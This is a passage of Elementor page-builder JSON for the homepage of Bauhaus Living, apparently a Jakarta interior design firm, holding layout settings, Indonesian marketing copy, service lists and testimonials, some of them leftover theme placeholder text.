template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Prijonno Nugroho\",\"job\":\"Action Coach Jakarta\",\"testimonial\":\"Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/56947243_2426566684042502_6812443397089918976_n.jpg\",\"id\":4923,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"4b2f506\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept 